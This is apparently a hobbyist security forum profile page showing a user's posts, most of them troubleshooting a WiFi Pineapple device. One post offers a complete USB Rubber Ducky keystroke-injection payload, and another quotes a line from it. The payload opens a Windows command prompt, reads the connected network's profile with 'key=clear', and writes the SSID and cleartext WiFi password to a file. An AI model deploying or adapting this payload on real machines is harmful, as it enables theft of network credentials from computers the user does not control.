Jump to content

RickyHax20

Active Members
  • Posts

    12
  • Joined

  • Last visited

Posts posted by RickyHax20

  1. On 3/14/2017 at 7:05 AM, Zylla said:

    You're not exactly providing a lot of information as to what you are doing exactly, and it's not easy to help when we don't have exact details.

    What are you talking about here exactly? I'm guessing it's the Pineapple website: http://172.16.42.1:1471
    Is that correct?

    If you have lost the password to login to your Pineapple, you can use the reset button (which is located on the Pineapple) to reset it to its factory default setttings.

    Never mind about it... I was connecting to the management AP at the time. When I mean "time after time" I meant that when I enter the password (that is the correct one) it tries to connect and asks me for the password again.

  2. On 3/11/2017 at 2:40 PM, illwill said:

    C:\Users\test>cd @%USERPROFILE%\Desktop@ & for /f @tokens=2 delims=: @ %A in ('netsh wlan show interface ^| findstr @SSID@ ^| findstr /v @BSSID@') do set A=%A
    2 was unexpected at this time.

    You don't put the @ when putting it in the command prompt. You put the @ when creating the ducky script. If the @ symbol is typed in the ducky script when creating the payload, the command prompt will replace every @ to " and vice-versa.

    That's why I put it in REM in bold " REM The @ will be typed as " in the Command prompt "

  3. I have an iPhone 7, and I was testing out the modules that needed me to go on random sites. So basically I could connect my phone to the Pineapple, however, I can't anymore, it will tell me time after time to enter the password, so I did and tells me to enter the password, but never told me that the password is incorrect. How can I fix this??? When I came across this problem before, I would change the password and it would let me through after entering the new password, but when I did this, it kept telling me to enter the password. What am I doing wrong or is there a solution for me to click on my pineapple wifi on my phone and have it connect as it remembers it before???

  4. On 3/11/2017 at 2:57 PM, JumboPackets said:

    Follow the instructions closely: as part of the instructions, you will browse to the factory firmware loading page on your device (which will have a default IP address of 192.168.1.1)...that page will give you a progress indicator and let you know when the firmware update is complete.

    Ok, everything is all good. Thanks a bunch!!!

  5. Ok, so here's a payoad that can grab any of the wifi info that the computer is connected to. To find the info once the payload is finished, you need to search for "Log.txt" Only works on Windows

    DELAY 1000
    GUI r
    DELAY 500
    STRING cmd
    ENTER
    DELAY 1000
    REM The @ will be typed as " in the Command prompt
    STRING cd @%USERPROFILE%\Desktop@ & for /f @tokens=2 delims=: @ %A in ('netsh wlan show interface ^| findstr @SSID@ ^| findstr /v @BSSID@') do set A=%A
    ENTER
    DELAY 100
    STRING netsh wlan show profiles %A% key=clear | findstr /c:@Network type@ /c:@Authentication@ /c:@Key Content@ | findstr /v @broadcast@ | findstr /v @Radio@>>A.txt
    ENTER
    DELAY 100
    STRING for /f @tokens=3 delims=: @ %A in ('findstr @Network type@ A.txt') do set B=%A
    ENTER
    DELAY 100
    STRING for /f @tokens=2 delims=: @ %A in ('findstr @Authentication@ A.txt') do set C=%A
    ENTER
    DELAY 100
    STRING for /f @tokens=3 delims=: @ %A in ('findstr @Key Content@ A.txt') do set D=%A
    ENTER
    DELAY 100
    STRING del A.txt
    ENTER
    DELAY 100
    STRING echo SSID: %A%>>Log.txt & echo Network type: %B%>>Log.txt & echo Authentication: %C%>>Log.txt & echo Password: %D%>>Log.txt
    ENTER

    Feel free to ask any questions and if there's any errors that need to be fixed on to this.

  6. I need help on setting up my pineapple. I was just doing fine with the setup until I had to go to the ip address. It didn't go through for a while, but managed to connect. When I pushed the reset button, like I suppose to do, and as it completed, I tried refreshing the page or something and didn't go through and went to saying, "took too long to respond." I kept on trying to reconnect and would not go through... I tried to reset it but don't know how to do it since it's not fully setup. I noticed that when i connect the pineapple, the blue LED light was on for about 5 seconds, and turns off. Don't know how I can fix this and nobody has any similar problems to mine... I just got this today and I hope I don't have to return it and get my money back...

×
×
  • Create New...